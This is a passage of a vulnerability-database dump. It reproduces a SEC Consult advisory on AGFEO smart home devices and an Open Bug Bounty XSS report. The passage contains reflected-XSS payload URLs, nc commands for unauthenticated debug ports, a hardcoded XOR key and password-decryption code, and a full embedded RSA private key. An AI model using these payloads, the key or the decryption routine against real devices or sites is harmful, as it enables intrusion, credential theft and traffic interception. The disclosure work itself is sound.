00\r\nupds <Timestamp> bLastReceiveBlockNum: 15\r\n[...]\r\nS\r\nupds <Timestamp>\r\nupds <Timestamp> ===== service-menue ======================\r\nupds <Timestamp> help help\r\nupds <Timestamp> q quit\r\nupds <Timestamp> D dial\r\nupds <Timestamp> d disconnect\r\nupds <Timestamp> ============ NOT AKTIV ===================\r\nservice submenue\r\n```\r\n\r\n3) Hardcoded cryptographic keys\r\n\r\nRefer to our study on hardcoded cryptographic secrets in embedded systems for further information.\r\n```\r\nhttp://blog.sec-consult.com/2016/09/house-of-keys-9-months-later-40-worse.html\r\n```\r\nIoT Inspector (http://www.iot-inspector.com/) was used to identify this vulnerability.\r\n```\r\nOpenSSL output for the certificate:\r\nCertificate:\r\n Data:\r\n Version: 1 (0x0)\r\n Serial Number: 10293758115057549292 (0x8edac6778bccbfec)\r\n Signature Algorithm: sha256WithRSAEncryption\r\n Issuer: C=DE, ST=Some-State, L=Bielefeld, O=AGFEO GmbH & Co. KG, OU=Dev,\r\nCN=info/emailAddress=info () agfeo de\r\n Validity\r\n Not Before: Oct 21 14:03:55 2014 GMT\r\n Not After : Mar 8 14:03:55 2042 GMT\r\n Subject: C=DE, ST=Some-State, L=Bielefeld, O=AGFEO GmbH & Co. KG, OU=Dev,\r\nCN=info/emailAddress=info () agfeo de\r\n Subject Public Key Info:\r\n Public Key Algorithm: rsaEncryption\r\n Public-Key: (2048 bit)\r\n Modulus:\r\n 00:be:79:ad:17:e8:c7:9e:63:b3:bb:67:ce:bd:79:\r\n 29:66:22:ce:63:99:6a:a5:31:f4:70:5f:3f:9d:11:\r\n 94:d6:65:8c:4e:43:6b:e4:d4:f1:f4:bd:81:4c:72:\r\n 67:50:10:09:b8:60:b3:cd:be:23:ce:9a:75:ec:e4:\r\n 7a:cf:3a:e2:f0:51:f9:a5:f3:c5:67:5d:01:e9:72:\r\n 68:b1:59:f5:5b:d8:dc:3e:1d:00:df:06:a6:07:06:\r\n 12:70:c7:97:05:a5:da:80:14:2c:c7:ae:6a:ef:a1:\r\n 1a:b8:f8:6b:71:5e:91:04:da:43:ba:cf:7c:ef:bd:\r\n 01:b7:15:a1:7b:8f:52:21:06:ad:48:b4:57:0c:b2:\r\n ac:b2:14:fe:30:38:96:5e:28:b8:68:b2:d3:ee:8d:\r\n 28:3c:ac:a0:95:c8:07:39:b7:df:95:6d:88:a2:12:\r\n 77:31:a8:55:f6:ab:c7:17:16:03:5f:ca:f2:ca:8f:\r\n fd:37:65:2c:b0:aa:47:59:fe:d6:ec:69:8f:db:b6:\r\n 9e:93:4b:f0:87:77:90:f6:5c:e4:64:d1:96:99:d5:\r\n d8:37:e4:7d:2f:bd:f4:04:fd:67:13:bc:68:ea:e6:\r\n 00:dd:72:74:a2:fe:1a:00:27:8b:b8:96:a6:0c:93:\r\n 82:52:6d:61:2c:62:02:b2:e8:ab:45:e4:87:98:d2:\r\n ba:57\r\n Exponent: 65537 (0x10001)\r\n Signature Algorithm: sha256WithRSAEncryption\r\n 37:12:cb:94:9a:51:f8:9a:04:9f:60:19:6a:12:23:38:10:85:\r\n b5:79:2b:49:5d:b6:65:82:76:c0:0b:20:d1:bf:04:ce:46:38:\r\n 56:ea:0b:2e:41:f5:61:d1:12:d4:ce:34:d9:e3:2a:bb:e8:9f:\r\n f1:0e:0d:da:37:91:ee:92:dd:9a:85:91:14:a2:21:87:da:52:\r\n 33:d6:ec:74:c0:3a:46:7f:82:02:91:75:99:ad:fd:72:1b:ec:\r\n 00:64:10:e1:9c:81:3b:c9:8e:6b:73:d5:e1:df:7b:60:d4:b6:\r\n 08:51:30:25:b1:a0:ed:f0:de:2e:15:33:c2:bf:c3:fe:69:1b:\r\n a8:26:c3:25:f0:53:8e:1f:8a:aa:44:f4:59:88:5b:7d:27:d6:\r\n a5:a9:e8:26:a9:ba:75:f0:84:5d:e0:e7:03:75:a0:a6:64:c4:\r\n 16:ce:88:16:ca:72:f2:43:7a:08:b5:e3:48:d7:c3:a1:3a:28:\r\n 43:3c:5a:30:d4:31:dc:68:a5:5c:da:7c:20:7b:ee:e6:a2:04:\r\n a3:3e:f1:5d:39:f4:89:d7:f0:f3:b4:e6:5e:81:cd:60:34:61:\r\n ef:e1:d8:59:f9:d0:5a:11:af:53:03:93:4a:9e:fb:1e:a3:8b:\r\n 94:90:de:59:91:59:ff:f3:1b:5a:ef:7f:aa:33:c2:47:50:05:\r\n 0a:bc:62:3c\r\n\r\nCertificate:\r\n-----BEGIN CERTIFICATE-----\r\nMIIDnDCCAoQCCQCO2sZ3i8y/7DANBgkqhkiG9w0BAQsFADCBjzELMAkGA1UEBhMC\r\nREUxEzARBgNVBAgMClNvbWUtU3RhdGUxEjAQBgNVBAcMCUJpZWxlZmVsZDEcMBoG\r\nA1UECgwTQUdGRU8gR21iSCAmIENvLiBLRzEMMAoGA1UECwwDRGV2MQ0wCwYDVQQD\r\nDARpbmZvMRwwGgYJKoZIhvcNAQkBFg1pbmZvQGFnZmVvLmRlMB4XDTE0MTAyMTE0\r\nMDM1NVoXDTQyMDMwODE0MDM1NVowgY8xCzAJBgNVBAYTAkRFMRMwEQYDVQQIDApT\r\nb21lLVN0YXRlMRIwEAYDVQQHDAlCaWVsZWZlbGQxHDAaBgNVBAoME0FHRkVPIEdt\r\nYkggJiBDby4gS0cxDDAKBgNVBAsMA0RldjENMAsGA1UEAwwEaW5mbzEcMBoGCSqG\r\nSIb3DQEJARYNaW5mb0BhZ2Zlby5kZTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCC\r\nAQoCggEBAL55rRfox55js7tnzr15KWYizmOZaqUx9HBfP50RlNZljE5Da+TU8fS9\r\ngUxyZ1AQCbhgs82+I86adezkes864vBR+aXzxWddAelyaLFZ9VvY3D4dAN8GpgcG\r\nEnDHlwWl2oAULMeuau+hGrj4a3FekQTaQ7rPfO+9AbcVoXuPUiEGrUi0VwyyrLIU\r\n/jA4ll4ouGiy0+6NKDysoJXIBzm335VtiKISdzGoVfarxxcWA1/K8sqP/TdlLLCq\r\nR1n+1uxpj9u2npNL8Id3kPZc5GTRlpnV2DfkfS+99AT9ZxO8aOrmAN1ydKL+GgAn\r\ni7iWpgyTglJtYSxiArLoq0Xkh5jSulcCAwEAATANBgkqhkiG9w0BAQsFAAOCAQEA\r\nNxLLlJpR+JoEn2AZahIjOBCFtXkrSV22ZYJ2wAsg0b8EzkY4VuoLLkH1YdES1M40\r\n2eMqu+if8Q4N2jeR7pLdmoWRFKIhh9pSM9bsdMA6Rn+CApF1ma39chvsAGQQ4ZyB\r\nO8mOa3PV4d97YNS2CFEwJbGg7fDeLhUzwr/D/mkbqCbDJfBTjh+KqkT0WYhbfSfW\r\npanoJqm6dfCEXeDnA3WgpmTEFs6IFspy8kN6CLXjSNfDoTooQzxaMNQx3GilXNp8\r\nIHvu5qIEoz7xXTn0idfw87TmXoHNYDRh7+HYWfnQWhGvUwOTSp77HqOLlJDeWZFZ\r\n//MbWu9/qjPCR1AFCrxiPA==\r\n-----END CERTIFICATE-----\r\n\r\nPrivate Key:\r\n-----BEGIN PRIVATE KEY-----\r\nMIIEvwIBADANBgkqhkiG9w0BAQEFAASCBKkwggSlAgEAAoIBAQC+ea0X6MeeY7O7\r\nZ869eSlmIs5jmWqlMfRwXz+dEZTWZYxOQ2vk1PH0vYFMcmdQEAm4YLPNviPOmnXs\r\n5HrPOuLwUfml88VnXQHpcmixWfVb2Nw+HQDfBqYHBhJwx5cFpdqAFCzHrmrvoRq4\r\n+GtxXpEE2kO6z3zvvQG3FaF7j1IhBq1ItFcMsqyyFP4wOJZeKLhostPujSg8rKCV\r\nyAc5t9+VbYiiEncxqFX2q8cXFgNfyvLKj/03ZSywqkdZ/tbsaY/btp6TS/CHd5D2\r\nXORk0ZaZ1dg35H0vvfQE/WcTvGjq5gDdcnSi/hoAJ4u4lqYMk4JSbWEsYgKy6KtF\r\n5IeY0rpXAgMBAAECggEAI7joKJrEjUT/mT8Pu+M0S25trKpCIPcsc8K5SHjapBbp\r\naGgmnQT+17qOvEqca5yGZijkr8pgJsg7I5F6ItFVbGLDYkdEl20PBbwqPFC1vmL+\r\nczu3RRyXGKwf2zzjavC++NRPzac9cPGS9GvKorlsky9oEmoFcWTOJIsO/QBVE9I8\r\nhPc5utxQQ5WTDfUD84Y2ELJx/qhZNB8gOF+KhDQT0slE1/7Y7sHMi++kxVj+KiVb\r\nKif3DxpB6reMP5s1zhmfJcF9pPrr6jT35OuEjQ15y9p9wrLL1txfJbi3O6Ucwd3q\r\nINHugNN/v+/6ia06aZtknxYoG+hFS7PbulU11VSimQKBgQDzoQRtO0MjEo3Gucqi\r\niaxpueYsAizJx9GkdCh7StN8ZWADpZj6x7B6vIhjXZO6Q5bM6j838lYWyNYsBHpq\r\nFXeAM8cPIm7xUpRQDLKfhU9YA9/6iQ8/dzTYR49uj67syc9HH9dIOsRyVAy2ci6S\r\nUySE3aTSCJCwSerpFZWoPqsbOwKBgQDIJbQQg+QnAOdTYdmIQv8zW6nLvuwLzNkP\r\nwxFlZ/78DI8+2h1H5LGd/2C2ybKIsif/pU5u721qkqxIrIc1I3BWcX+O+QwiJ1oO\r\nSBeA3gzcD7IOpW2GqyN8tt8cWo48moDjIcSYGB6mSd0WmX7MfsOxnEybLWQIKHD4\r\nsTclSDuTlQKBgQDZyRGk97oPazGT+Vf8LmgS5xysMJGLG3X7td7OQFiHtjO7btgv\r\nLj1Dqq+da/R4KJ1wtuImiBqPKZ/TH3myxVfbIe4LSHO2hGSSnpc65LfF7UjWtJkN\r\n2elCgc3lPspXYBxL71nKdsZPkXT/z1h0c6CMqXoCS6fT/2/gRuxOxx68KwKBgQCo\r\nSEM465wmSzU0v34GesZWKUj/nXycg1UyUoJK8ADNbcX3Q68A5sGMpc9sgPQSyTCm\r\nWxgyYC9wPviKdj2MqUpn9DAbRz0zbkDi5yyT1p+bW7sLY35Oj5Bb6Op4zY7wV7vs\r\nvVStyQHkMRCqUs7xI9hoepFSm/ySe2ZZQ6+pMi2dbQKBgQCn9FdGZzWOAIXrfj7Q\r\nSoMEUPEIEdxXYEy8Rudh9VVIJQW4tvYX6mQMr8fgx5RKRaTsL1Qv/tn9XGq00wes\r\n3NuLEq2urJAC7z8smqkvWm2xo91j+ExeRL66CfPdm5KPyaCXcuFysz5/LUKxG/a3\r\n+K62TQB1mEb1t9WQsxJYGcUiyg==\r\n-----END PRIVATE KEY-----\r\n```\r\n\r\n4) Multiple reflected cross site scripting (XSS) vulnerabilities\r\n\r\nThe following crafted requests can be used to trigger the cross site scripting vulnerability at different entry points:\r\n```\r\nhttp://<Device-IP>:20011/ais.php/%22%3E%3Cscript%3Ealert%28'XSS'%29%3C%2fscript%3E\r\nhttp://<Device-IP>:20011/xtopbxwav.php/%22%3E%3Cscript%3Ealert%28'XSS'%29%3C%2fscript%3E\r\nhttp://<Device-IP>:20011/update.php/%22%3E%3Cscript%3Ealert%28'XSS'%29%3C%2fscript%3E\r\nhttp://<Device-IP>/pbxapi/licence.php/%3Cimg%20src=x%20onerror=alert%28'XSS'%29%3E\r\nhttp://<Device-IP>/pbxapi/eoimport.php/%3Cimg%20src=x%20onerror=alert%28'XSS'%29%3E\r\nhttp://<Device-IP>/pbxapi/knximport.php/%3Cimg%20src=x%20onerror=alert%28'XSS'%29%3E\r\nhttp://<Device-IP>/pbxapi/hmimport.php/%3Cimg%20src=x%20onerror=alert%28'XSS'%29%3E\r\n```\r\n\r\n### Vulnerable / tested versions:\r\n\r\nOne firmware is available for the whole ES 5 product line, and another one for the product line ES 6. Therefore, all vulnerabilities which have been found in one product of ES 5/6 are also available in all other products of ES 5/6.\r\n\r\nThe following product / firmware version has been tested by SEC Consult:\r\n* ES 512 Version 1.9b (es5xxv19b_c063be6)\r\n* ES 512 Version 1.10 (es5xxv110_f105485)\r\n\r\nBased on results of the SEC Technologies IoT Inspector (http://www.iot-inspector.com/ - automated firmware analysis tool) we believe that the product line ES 6 is also prone to the identified vulnerabilities (except the web service on port 20011) as well as product line ES 5.\r\n\r\n* Firmware Version 1.9b (ES6xxv19b_c063be67b9c2ba)\r\n* Firmware Version 1.10 (ES6xxv110_f105485715a360)", "published": "2018-04-28T00:00:00", "type": "seebug", "title": "Multiple critical vulnerabilities in AGFEO smart home ES 5xx/6xx products", "bulletinFamily": "exploit", "cvelist": [], "modified": "2018-04-28T00:00:00", "id": "SSV:97254", "href": "https://www.seebug.org/vuldb/ssvid-97254", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": ""}], "openbugbounty": [{"lastseen": "2018-03-15T01:09:38", "bulletinFamily": "bugbounty", "cvelist": [], "description": "##### Open Bug Bounty ID: OBB-372548\n\nDescription| Value \n---|--- \nAffected Website:| aplusa-online.com \nVulnerable Application:| Custom Code \nVulnerability Type:| XSS (Cross Site Scripting) / CWE-79 \nCVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N] \nRemediation Guide:| OWASP XSS Prevention Cheat Sheet \n \n##### Vulnerable URL:\n \n \n https://www.aplusa-online.com/vis/v1/en/search?oid=19004\u2329=2&_query=%27-alert(5)-%27\n \n\n##### Coordinated Disclosure Timeline\n\nDescription| Value \n---|--- \nVulnerability Reported:| 27 October, 2017 11:19 GMT \nVulnerability Verified:| 27 October, 2017 11:22 GMT \nWebsite Operator Notified:| 27 October, 2017 11:22 GMT \nVulnerability Published:| 27 October, 2017 11:22 GMT[without any technical details] \nPublic Disclosure:| 25 January, 2018 11:19 GMT\n", "modified": "2018-01-25T11:19:00", "published": "2017-10-27T11:19:00", "id": "OBB:372548", "href": "https://www.openbugbounty.org/reports/372548/", "type": "openbugbounty", "title": "aplusa-online.com XSS vulnerability ", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-03-20T05:17:14", "description": "AGFEO Smart Home ES 5xx / 6xx versions 1.9b and 1.10 suffers from authentication bypass, cross site scripting, and hard-coded private key vulnerabilities.", "edition": 1, "published": "2017-07-13T00:00:00", "title": "AGFEO Smart Home ES 5xx / 6xx Authentication Bypass / XSS / Hardcoded Credentials Vulnerabilities", "type": "zdt", "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-07-13T00:00:00", "href": "https://0day.today/exploit/description/28123", "id": "1337DAY-ID-28123", "sourceData": "title: Multiple critical vulnerabilities\r\n product: AGFEO Smart Home ES 5xx\r\n AGFEO Smart Home ES 6xx\r\n vulnerable version: at least 1.9b, 1.10\r\n fixed version: 1.12c\r\n CVE number: -\r\n impact: Critical\r\n homepage: https://www.agfeo.de/\r\n found: 2016-12-28\r\n by: T. Weber (Office Vienna)\r\n SEC Consult Vulnerability Lab\r\n\r\n An integrated part of SEC Consult\r\n Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow\r\n Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich\r\n\r\n https://www.sec-consult.com\r\n\r\n=======================================================================\r\n\r\nVendor description:\r\n-------------------\r\nAGFEO GmbH & Co. KG is a vendor of telephone systems and other\r\n(tele-)communication products like DECT phones, headsets or smart home\r\nproducts as well.\r\n\r\n\r\nBusiness recommendation:\r\n------------------------\r\nThe available patches should be installed immediately.\r\n\r\nSEC Consult recommends not to use this product in a production environment\r\nuntil a thorough security review has been performed by security professionals\r\nas there are indications for further security issues.\r\n\r\n\r\nVulnerability overview/description:\r\n-----------------------------------\r\n1) Unauthenticated access to web services and authentication bypass\r\nA web service with multiple scripts for debug purposes is accessible\r\non an unusual port on the device. There is also a script to read files from\r\nthe filesystem. As the web service runs with root privileges all files\r\non the operating system can be read by an attacker. This only affects the\r\nES 5xx product line, all other vulnerabilities affect both ES 5xx and 6xx.\r\n\r\nThe configuration of the device can be changed and arbitrary updates can be\r\nuploaded as well as music files for the answering machine. By reading the\r\ndatabase content, the usernames and their passwords can be revealed and easily\r\ndecrypted. This way the administrator password can be dumped from the database\r\nand the device can be fully administrated by an attacker.\r\nThe normal user interface has an additional development subfolder which was\r\nprobably used during the development process. Updates can be triggered from\r\nthis sub platform and log files, statistics and states can also be displayed.\r\n\r\n\r\n2) Unauthenticated access to configuration ports\r\nMultiple different instances of TCP services are present on the device. Each\r\nof the listening sockets is forked from a debug and configuration service.\r\nInternal device information can be read from the device. Among other commands,\r\nthe configuration of the device can also be altered by using these services.\r\n\r\n\r\n3) Hardcoded cryptographic keys\r\nThree certificates including their private keys are embedded in the firmware\r\nof AGFEO ES 5xx/6xx SmartHome products. The certificates and keys in both\r\nproduct lines are exactly the same. One certificate is used for HTTPS\r\n(default server certificate for web based configuration and management).\r\n\r\nImpersonation, man-in-the-middle or passive decryption attacks are possible.\r\nThese attacks allow an attacker to gain access to sensitive information like\r\nadmin credentials and use them in further attacks.\r\n\r\n\r\n4) Multiple reflected cross site scripting (XSS) vulnerabilities\r\nThe ES 5xx SmartHome products are vulnerable to reflected cross site scripting.\r\nMalicious JavaScript code can be executed in the browser of a victim by luring\r\nto a handcrafted link. This is possible even if the victim is not logged in.\r\nIt is assumed that the 6xx products are affected as well but those could not be\r\ntested.\r\n\r\n\r\nProof of concept:\r\n-----------------\r\n1) Unauthenticated access to web services and authentication bypass\r\nThe debug web service is available by using the following url:\r\nhttp://<Device-IP>:20011/index.html\r\nThere are different scripts accessible, the following actions can be executed:\r\n -) Change IP configuration\r\n -) Change time zone\r\n -) Upload updates (Any files can be uploaded to the device!)\r\n -) Read all files on the filesystem\r\n -) Play, delete and move voice messages on all mail boxes\r\n -) Converting mp3 files to wav files\r\n -) List all connected phones and the related numbers\r\n\r\nThe SQLite database is located under \"/home/profile/poolstore.db\". By reading\r\nthis file the usernames and passwords can be dumped. The passwords are encoded\r\nwith base64 and encrypted with XOR. To decrypt the XOR'ed password the\r\nfollowing key has to be used:\r\n \"0x42 0xab 0xce 0xfa 0x54 0xed 0xcf 0xba\"\r\n\r\nThe function to decrypt the password was found in the php script \"login.php\":\r\nfunction decodePassword($PasswordEnc)\r\n{\r\n $PasswordBinaryEncBase64 = \"\";\r\n $PasswordBinaryEnc=\"\";\r\n $PasswordBinary = array();\r\n $Password = \"\";\r\n $lastChar=0;\r\n\r\n $Key=array(0x42, 0xab, 0xce, 0xfa, 0x54, 0xed, 0xcf, 0xba);\r\n\r\n $PasswordBinaryEncBase64 = $PasswordEnc;\r\n\r\n // base64 decode\r\n $PasswordBinaryEnc = base64_decode($PasswordBinaryEncBase64);\r\n\r\n // xor decode\r\n for($i=0; $i<strlen($PasswordBinaryEnc); $i++) {\r\n $PasswordBinary[$i] = ord($PasswordBinaryEnc[$i]) ^ $Key[$i % count($Key)]\r\n^ $lastChar;\r\n $lastChar = ord($PasswordBinaryEnc[$i]);\r\n }\r\n\r\n // erstes Zeichen entfernen (random char!)\r\n foreach ($PasswordBinary as $chr) {\r\n $Password .= chr($chr);\r\n }\r\n $Password = substr($Password, 1);\r\n // printf(\"%s:%d Password %s\\n\", __FUNCTION__, __LINE__, $Password);\r\n return $Password;\r\n}\r\n\r\nAn additional subfolder, which contains debug scripts, is available under the\r\nfollowing location:\r\nhttp://<Device-IP>/shdev/ui9.php\r\n\r\nUpdates can be triggered, logs can be shown and status messages can be gathered\r\nwithin this functionality. Furthermore, it is possible to debug the login\r\nprocess. Since there is a hardcoded user \"admin\" a brute force attack is also\r\npossible.\r\n\r\n\r\n2) Unauthenticated access to configuration ports\r\nThe following TCP ports can be accessed with \"nc <Device-IP> -p <Port>\":\r\n19002, 19004, 19006, 19009, 19010, 19080, 19081\r\nBy connecting to one of these ports a debug interface spawns. For example the\r\nconnection to port 19081:\r\n$ nc 192.168.0.40 19081\r\nStart Menue: <Return>\r\n========< UPDS - Menue >========\r\ns: show state\r\nh: help\r\nD: DEBmod on\r\nd: DEBmod off\r\nL: LOG on\r\nl: LOG off\r\nS: SERVICE-SUBMENUE\r\nq: Quit telnet session\r\n========= NOT AKTIV ===========\r\ns\r\nstatus ausgeben (noch nicht vollstaendig implementiert)\r\nupds <Timestamp> bState: 00\r\nupds <Timestamp> bLastReceiveBlockNum: 15\r\n[...]\r\nS\r\nupds <Timestamp>\r\nupds <Timestamp> ===== service-menue ======================\r\nupds <Timestamp> help help\r\nupds <Timestamp> q quit\r\nupds <Timestamp> D dial\r\nupds <Timestamp> d disconnect\r\nupds <Timestamp> ============ NOT AKTIV ===================\r\nservice submenue\r\n\r\n\r\n3) Hardcoded cryptographic keys\r\nRefer to our study on hardcoded cryptographic secrets in embedded systems for\r\nfurther information.\r\nhttp://blog.sec-consult.com/2016/09/house-of-keys-9-months-later-40-worse.html\r\nIoT Inspector (http://www.iot-inspector.com/) was used to identify this\r\nvulnerability.\r\n\r\nOpenSSL output for the certificate:\r\nCertificate:\r\n Data:\r\n Version: 1 (0x0)\r\n Serial Number: 10293758115057549292 (0x8edac6778bccbfec)\r\n Signature Algorithm: sha256WithRSAEncryption\r\n Issuer: C=DE, ST=Some-State, L=Bielefeld, O=AGFEO GmbH & Co. KG, OU=Dev,\r\nCN=info/[email\u00a0protected]\r\n Validity\r\n Not Before: Oct 21 14:03:55 2014 GMT\r\n Not After : Mar 8 14:03:55 2042 GMT\r\n Subject: C=DE, ST=Some-State, L=Bielefeld, O=AGFEO GmbH & Co. KG, OU=Dev,\r\nCN=info/[email\u00a0protected]\r\n Subject Public Key Info:\r\n Public Key Algorithm: rsaEncryption\r\n Public-Key: (2048 bit)\r\n Modulus:\r\n 00:be:79:ad:17:e8:c7:9e:63:b3:bb:67:ce:bd:79:\r\n 29:66:22:ce:63:99:6a:a5:31:f4:70:5f:3f:9d:11:\r\n 94:d6:65:8c:4e:43:6b:e4:d4:f1:f4:bd:81:4c:72:\r\n 67:50:10:09:b8:60:b3:cd:be:23:ce:9a:75:ec:e4:\r\n 7a:cf:3a:e2:f0:51:f9:a5:f3:c5:67:5d:01:e9:72:\r\n 68:b1:59:f5:5b:d8:dc:3e:1d:00:df:06:a6:07:06:\r\n 12:70:c7:97:05:a5:da:80:14:2c:c7:ae:6a:ef:a1:\r\n 1a:b8:f8:6b:71:5e:91:04:da:43:ba:cf:7c:ef:bd:\r\n 01:b7:15:a1:7b:8f:52:21:06:ad:48:b4:57:0c:b2:\r\n ac:b2:14:fe:30:38:96:5e:28:b8:68:b2:d3:ee:8d:\r\n 28:3c:ac:a0:95:c8:07:39:b7:df:95:6d:88:a2:12:\r\n 77:31:a8:55:f6:ab:c7:17:16:03:5f:ca:f2:ca:8f:\r\n fd:37:65:2c:b0:aa:47:59:fe:d6:ec:69:8f:db:b6:\r\n 9e:93:4b:f0:87:77:90:f6:5c:e4:64:d1:96:99:d5:\r\n d8:37:e4:7d:2f:bd:f4:04:fd:67:13:bc:68:ea:e6:\r\n 00:dd:72:74:a2:fe:1a:00:27:8b:b8:96:a6:0c:93:\r\n 82:52:6d:61:2c:62:02:b2:e8:ab:45:e4:87:98:d2:\r\n ba:57\r\n Exponent: 65537 (0x10001)\r\n Signature Algorithm: sha256WithRSAEncryption\r\n 37:12:cb:94:9a:51:f8:9a:04:9f:60:19:6a:12:23:38:10:85:\r\n b5:79:2b:49:5d:b6:65:82:76:c0:0b:20:d1:bf:04:ce:46:38:\r\n 56:ea:0b:2e:41:f5:61:d1:12:d4:ce:34:d9:e3:2a:bb:e8:9f:\r\n f1:0e:0d:da:37:91:ee:92:dd:9a:85:91:14:a2:21:87:da:52:\r\n 33:d6:ec:74:c0:3a:46:7f:82:02:91:75:99:ad:fd:72:1b:ec:\r\n 00:64:10:e1:9c:81:3b:c9:8e:6b:73:d5:e1:df:7b:60:d4:b6:\r\n 08:51:30:25:b1:a0:ed:f0:de:2e:15:33:c2:bf:c3:fe:69:1b:\r\n a8:26:c3:25:f0:53:8e:1f:8a:aa:44:f4:59:88:5b:7d:27:d6:\r\n a5:a9:e8:26:a9:ba:75:f0:84:5d:e0:e7:03:75:a0:a6:64:c4:\r\n 16:ce:88:16:ca:72:f2:43:7a:08:b5:e3:48:d7:c3:a1:3a:28:\r\n 43:3c:5a:30:d4:31:dc:68:a5:5c:da:7c:20:7b:ee:e6:a2:04:\r\n a3:3e:f1:5d:39:f4:89:d7:f0:f3:b4:e6:5e:81:cd:60:34:61:\r\n ef:e1:d8:59:f9:d0:5a:11:af:53:03:93:4a:9e:fb:1e:a3:8b:\r\n 94:90:de:59:91:59:ff:f3:1b:5a:ef:7f:aa:33:c2:47:50:05:\r\n 0a:bc:62:3c\r\n\r\nCertificate:\r\n-----BEGIN CERTIFICATE-----\r\nMIIDnDCCAoQCCQCO2sZ3i8y/7DANBgkqhkiG9w0BAQsFADCBjzELMAkGA1UEBhMC\r\nREUxEzARBgNVBAgMClNvbWUtU3RhdGUxEjAQBgNVBAcMCUJpZWxlZmVsZDEcMBoG\r\nA1UECgwTQUdGRU8gR21iSCAmIENvLiBLRzEMMAoGA1UECwwDRGV2MQ0wCwYDVQQD\r\nDARpbmZvMRwwGgYJKoZIhvcNAQkBFg1pbmZvQGFnZmVvLmRlMB4XDTE0MTAyMTE0\r\nMDM1NVoXDTQyMDMwODE0MDM1NVowgY8xCzAJBgNVBAYTAkRFMRMwEQYDVQQIDApT\r\nb21lLVN0YXRlMRIwEAYDVQQHDAlCaWVsZWZlbGQxHDAaBgNVBAoME0FHRkVPIEdt\r\nYkggJiBDby4gS0cxDDAKBgNVBAsMA0RldjENMAsGA1UEAwwEaW5mbzEcMBoGCSqG\r\nSIb3DQEJARYNaW5mb0BhZ2Zlby5kZTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCC\r\nAQoCggEBAL55rRfox55js7tnzr15KWYizmOZaqUx9HBfP50RlNZljE5Da+TU8fS9\r\ngUxyZ1AQCbhgs82+I86adezkes864vBR+aXzxWddAelyaLFZ9VvY3D4dAN8GpgcG\r\nEnDHlwWl2oAULMeuau+hGrj4a3FekQTaQ7rPfO+9AbcVoXuPUiEGrUi0VwyyrLIU\r\n/jA4ll4ouGiy0+6NKDysoJXIBzm335VtiKISdzGoVfarxxcWA1/K8sqP/TdlLLCq\r\nR1n+1uxpj9u2npNL8Id3kPZc5GTRlpnV2DfkfS+99AT9ZxO8aOrmAN1ydKL+GgAn\r\ni7iWpgyTglJtYSxiArLoq0Xkh5jSulcCAwEAATANBgkqhkiG9w0BAQsFAAOCAQEA\r\nNxLLlJpR+JoEn2AZahIjOBCFtXkrSV22ZYJ2wAsg0b8EzkY4VuoLLkH1YdES1M40\r\n2eMqu+if8Q4N2jeR7pLdmoWRFKIhh9pSM9bsdMA6Rn+CApF1ma39chvsAGQQ4ZyB\r\nO8mOa3PV4d97YNS2CFEwJbGg7fDeLhUzwr/D/mkbqCbDJfBTjh+KqkT0WYhbfSfW\r\npanoJqm6dfCEXeDnA3WgpmTEFs6IFspy8kN6CLXjSNfDoTooQzxaMNQx3GilXNp8\r\nIHvu5qIEoz7xXTn0idfw87TmXoHNYDRh7+HYWfnQWhGvUwOTSp77HqOLlJDeWZFZ\r\n//MbWu9/qjPCR1AFCrxiPA==\r\n-----END CERTIFICATE-----\r\n\r\nPrivate Key:\r\n-----BEGIN PRIVATE KEY-----\r\nMIIEvwIBADANBgkqhkiG9w0BAQEFAASCBKkwggSlAgEAAoIBAQC+ea0X6MeeY7O7\r\nZ869eSlmIs5jmWqlMfRwXz+dEZTWZYxOQ2vk1PH0vYFMcmdQEAm4YLPNviPOmnXs\r\n5HrPOuLwUfml88VnXQHpcmixWfVb2Nw+HQDfBqYHBhJwx5cFpdqAFCzHrmrvoRq4\r\n+GtxXpEE2kO6z3zvvQG3FaF7j1IhBq1ItFcMsqyyFP4wOJZeKLhostPujSg8rKCV\r\nyAc5t9+VbYiiEncxqFX2q8cXFgNfyvLKj/03ZSywqkdZ/tbsaY/btp6TS/CHd5D2\r\nXORk0ZaZ1dg35H0vvfQE/WcTvGjq5gDdcnSi/hoAJ4u4lqYMk4JSbWEsYgKy6KtF\r\n5IeY0rpXAgMBAAECggEAI7joKJrEjUT/mT8Pu+M0S25trKpCIPcsc8K5SHjapBbp\r\naGgmnQT+17qOvEqca5yGZijkr8pgJsg7I5F6ItFVbGLDYkdEl20PBbwqPFC1vmL+\r\nczu3RRyXGKwf2zzjavC++NRPzac9cPGS9GvKorlsky9oEmoFcWTOJIsO/QBVE9I8\r\nhPc5utxQQ5WTDfUD84Y2ELJx/qhZNB8gOF+KhDQT0slE1/7Y7sHMi++kxVj+KiVb\r\nKif3DxpB6reMP5s1zhmfJcF9pPrr6jT35OuEjQ15y9p9wrLL1txfJbi3O6Ucwd3q\r\nINHugNN/v+/6ia06aZtknxYoG+hFS7PbulU11VSimQKBgQDzoQRtO0MjEo3Gucqi\r\niaxpueYsAizJx9GkdCh7StN8ZWADpZj6x7B6vIhjXZO6Q5bM6j838lYWyNYsBHpq\r\nFXeAM8cPIm7xUpRQDLKfhU9YA9/6iQ8/dzTYR49uj67syc9HH9dIOsRyVAy2ci6S\r\nUySE3aTSCJCwSerpFZWoPqsbOwKBgQDIJbQQg+QnAOdTYdmIQv8zW6nLvuwLzNkP\r\nwxFlZ/78DI8+2h1H5LGd/2C2ybKIsif/pU5u721qkqxIrIc1I3BWcX+O+QwiJ1oO\r\nSBeA3gzcD7IOpW2GqyN8tt8cWo48moDjIcSYGB6mSd0WmX7MfsOxnEybLWQIKHD4\r\nsTclSDuTlQKBgQDZyRGk97oPazGT+Vf8LmgS5xysMJGLG3X7td7OQFiHtjO7btgv\r\nLj1Dqq+da/R4KJ1wtuImiBqPKZ/TH3myxVfbIe4LSHO2hGSSnpc65LfF7UjWtJkN\r\n2elCgc3lPspXYBxL71nKdsZPkXT/z1h0c6CMqXoCS6fT/2/gRuxOxx68KwKBgQCo\r\nSEM465wmSzU0v34GesZWKUj/nXycg1UyUoJK8AD